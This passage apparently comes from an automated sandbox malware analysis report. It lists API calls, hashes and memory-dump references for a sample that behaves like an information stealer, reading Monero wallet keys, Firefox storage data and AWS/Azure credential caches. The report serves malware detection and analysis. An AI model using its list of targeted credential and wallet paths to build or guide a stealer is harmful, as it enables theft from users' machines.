                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                        • String ID: %s%s
                        • API String ID: 2672039231-3252725368
                        • Opcode ID: 6a5f0bde40fcc3829e4634f2095e26a34946252d74cca9de7d864eb4dcd2aee9
                        • Instruction ID: f39becda513ddb066a113b9a11eed9864fac45237c189040d688a70860c547fd
                        • Opcode Fuzzy Hash: 6a5f0bde40fcc3829e4634f2095e26a34946252d74cca9de7d864eb4dcd2aee9
                        • Instruction Fuzzy Hash: 72F17A71A00114AFDB14DB74DD48AEAB7BAEF88310F108159F90DA7351EF74AE44CBA5
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00441F9F
                        • lstrlen.KERNEL32(015892A8), ref: 00441FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 00441FE3
                        • lstrlen.KERNEL32(00471794), ref: 00441FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044200E
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00442042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044204D
                        • lstrlen.KERNEL32(00471794), ref: 00442058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442075
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00442081
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004420AC
                        • lstrlen.KERNEL32(?), ref: 004420E4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442104
                        • lstrcat.KERNEL32(00000000,?), ref: 00442112
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442139
                        • lstrlen.KERNEL32(00471794), ref: 0044214B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044216B
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00442177
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044219D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004421A8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004421D4
                        • lstrlen.KERNEL32(?), ref: 004421EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044220A
                        • lstrcat.KERNEL32(00000000,?), ref: 00442218
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442242
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044227F
                        • lstrlen.KERNEL32(0158D250), ref: 0044228D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004422B1
                        • lstrcat.KERNEL32(00000000,0158D250), ref: 004422B9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004422F7
                        • lstrcat.KERNEL32(00000000), ref: 00442304
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044232D
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00442356
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00442382
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004423BF
                        • DeleteFileA.KERNEL32(00000000), ref: 004423F7
                        • FindNextFileA.KERNEL32(00000000,?), ref: 00442444
                        • FindClose.KERNEL32(00000000), ref: 00442453
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                        • String ID:
                        • API String ID: 2857443207-0
                        • Opcode ID: 288e8445349459c68df0196558bee14fccb5e3ab4bcc92ec8187e2e9c005d59c
                        • Instruction ID: 6e7b7b3446fe329b1fc9e002b405679612c8aca8b87a74c42c3877b0c8e26d60
                        • Opcode Fuzzy Hash: 288e8445349459c68df0196558bee14fccb5e3ab4bcc92ec8187e2e9c005d59c
                        • Instruction Fuzzy Hash: EEE16671A102069BEB21EF75DE85A9FB7B9AF04304F84502AFC05A7311DB78DD45CBA8
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456445
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456480
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004564AA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004564E1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456506
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045650E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456537
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FolderPathlstrcat
                        • String ID: \..\
                        • API String ID: 2938889746-4220915743
                        • Opcode ID: 984b1e41eb5ed53b7d9413323948c40d4703bab43b254131b032b912d2fa3b6b
                        • Instruction ID: d2b821b74d7ffa2513619633e9c1b8c2d30ce5913f7c76e31737894b1ce37d37
                        • Opcode Fuzzy Hash: 984b1e41eb5ed53b7d9413323948c40d4703bab43b254131b032b912d2fa3b6b
                        • Instruction Fuzzy Hash: 04F1CE70A01205ABDB25AF35DD49AAF77B5AF04305F85402AFC4597352DB3CDC49CBA8
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004543A3
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004543D6
                        • lstrcpy.KERNEL32(00000000,?), ref: 004543FE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00454409
                        • lstrlen.KERNEL32(\storage\default\), ref: 00454414
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454431
                        • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0045443D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454466
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00454471
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454498
                        • lstrcpy.KERNEL32(00000000,?), ref: 004544D7
                        • lstrcat.KERNEL32(00000000,?), ref: 004544DF
                        • lstrlen.KERNEL32(00471794), ref: 004544EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454507
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00454513
                        • lstrlen.KERNEL32(.metadata-v2), ref: 0045451E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045453B
                        • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00454547
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045456E
                        • lstrcpy.KERNEL32(00000000,?), ref: 004545A0
                        • GetFileAttributesA.KERNEL32(00000000), ref: 004545A7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454601
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045462A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00454653
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045467B
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004546AF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                        • String ID: .metadata-v2$\storage\default\
                        • API String ID: 1033685851-762053450
                        • Opcode ID: 4456c9bf8c72e5ed32df5437790236a224f688400a7ed91de89922e20b191672
                        • Instruction ID: 6e3580512d2a3ea0d31547485fc14b9194675e2b17a93cc610f505fb8c34f90c
                        • Opcode Fuzzy Hash: 4456c9bf8c72e5ed32df5437790236a224f688400a7ed91de89922e20b191672
                        • Instruction Fuzzy Hash: 49B1D530610206ABDB21EF75DD49A6F77A9AF44309F40102AFC45EB352DB7CDC858BA8
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004557D5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00455804
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455835
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045585D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00455868
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455890
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004558C8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004558D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004558F8
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0045592E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455956
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00455961
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455988
                        • lstrlen.KERNEL32(00471794), ref: 0045599A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004559B9
                        • lstrcat.KERNEL32(00000000,00471794), ref: 004559C5
                        • lstrlen.KERNEL32(0158D460), ref: 004559D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004559F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00455A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455A2C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455A58
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00455A5F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00455AB7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00455B2D
                        • lstrcpy.KERNEL32(00000000,?), ref: 00455B56
                        • lstrcpy.KERNEL32(00000000,?), ref: 00455B89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455BB5
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00455BEF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00455C4C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00455C70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2428362635-0
                        • Opcode ID: 77e30ff87d6a767762ae10705f66342c0b08179b255cbd1da577966f09ca58e0
                        • Instruction ID: 9f8b9fa4af58da532e39465d0ced55120951078cf4e1becd5b348cad4cf66a50
                        • Opcode Fuzzy Hash: 77e30ff87d6a767762ae10705f66342c0b08179b255cbd1da577966f09ca58e0
                        • Instruction Fuzzy Hash: 4102C370A106059BDB25EF79C999AAFBBF5AF04301F44412AFC05A3351DB78DC49CBA8
                        APIs
                          • Part of subcall function 00441120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00441135
                          • Part of subcall function 00441120: RtlAllocateHeap.NTDLL(00000000), ref: 0044113C
                          • Part of subcall function 00441120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00441159
                          • Part of subcall function 00441120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00441173
                          • Part of subcall function 00441120: RegCloseKey.ADVAPI32(?), ref: 0044117D
                        • lstrcat.KERNEL32(?,00000000), ref: 004411C0
                        • lstrlen.KERNEL32(?), ref: 004411CD
                        • lstrcat.KERNEL32(?,.keys), ref: 004411E8
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044121F
                        • lstrlen.KERNEL32(015892A8), ref: 0044122D
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441251
                        • lstrcat.KERNEL32(00000000,015892A8), ref: 00441259
                        • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00441264
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441288
                        • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00441294
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004412BA
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004412FF
                        • lstrlen.KERNEL32(0158D250), ref: 0044130E
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441335
                        • lstrcat.KERNEL32(00000000,?), ref: 0044133D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00441378
                        • lstrcat.KERNEL32(00000000), ref: 00441385
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004413AC
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 004413D5
                        • lstrcpy.KERNEL32(00000000,?), ref: 00441401
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044143D
                          • Part of subcall function 0045EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0045EE12
                        • DeleteFileA.KERNEL32(?), ref: 00441471
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                        • String ID: .keys$\Monero\wallet.keys
                        • API String ID: 2881711868-3586502688
                        • Opcode ID: d6dda6527dcc810e4c919635b014ce55c0960520359f06e65019bd5efb740767
                        • Instruction ID: 31226ea4c12220b8bfbd0b1557ea3df5e5b5c818321cfac280359fa3cf5bb24d
                        • Opcode Fuzzy Hash: d6dda6527dcc810e4c919635b014ce55c0960520359f06e65019bd5efb740767
                        • Instruction Fuzzy Hash: 00A1C971B102059BEB21EF75DD49A9FB7B9AF44304F44006AF805E7351DB78DD818BA8
                        APIs
                        • memset.MSVCRT ref: 0045E740
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0045E769
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E79F
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E7AD
                        • lstrcat.KERNEL32(?,\.azure\), ref: 0045E7C6
                        • memset.MSVCRT ref: 0045E805
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0045E82D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E85F
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E86D
                        • lstrcat.KERNEL32(?,\.aws\), ref: 0045E886
                        • memset.MSVCRT ref: 0045E8C5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0045E8F1
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045E920
                        • lstrcat.KERNEL32(?,00000000), ref: 0045E92E
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0045E947
                        • memset.MSVCRT ref: 0045E986
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$memset$FolderPathlstrcpy
                        • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 4067350539-3645552435
                        • Opcode ID: 44e52f372c4d9dcdbd8ac8640bd13bf6b68483857bb8386c679047c7c93c8518
                        • Instruction ID: 9737acb40bdb0ac69c1909aa179f5dea9d64c4b3942eeeb747ffba0674f66d6a
                        • Opcode Fuzzy Hash: 44e52f372c4d9dcdbd8ac8640bd13bf6b68483857bb8386c679047c7c93c8518
                        • Instruction Fuzzy Hash: 18713B71A50218ABD725EB74CC46FED7374AF48300F50049DBA19AB1C1DFB89B848B6C
                        APIs
                        • lstrcpy.KERNEL32 ref: 0045ABCF
                        • lstrlen.KERNEL32(0158DFC8), ref: 0045ABE5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AC0D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045AC18
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AC41
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AC84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045AC8E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045ACB7
                        • lstrlen.KERNEL32(00474AD4), ref: 0045ACD1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045ACF3
                        • lstrcat.KERNEL32(00000000,00474AD4), ref: 0045ACFF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AD28
                        • lstrlen.KERNEL32(00474AD4), ref: 0045AD3A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AD5C
                        • lstrcat.KERNEL32(00000000,00474AD4), ref: 0045AD68
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AD91
                        • lstrlen.KERNEL32(0158E088), ref: 0045ADA7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045ADCF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045ADDA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AE03
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045AE3F
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045AE49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045AE6F
                        • lstrlen.KERNEL32(00000000), ref: 0045AE85
                        • lstrcpy.KERNEL32(00000000,0158E1C0), ref: 0045AEB8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
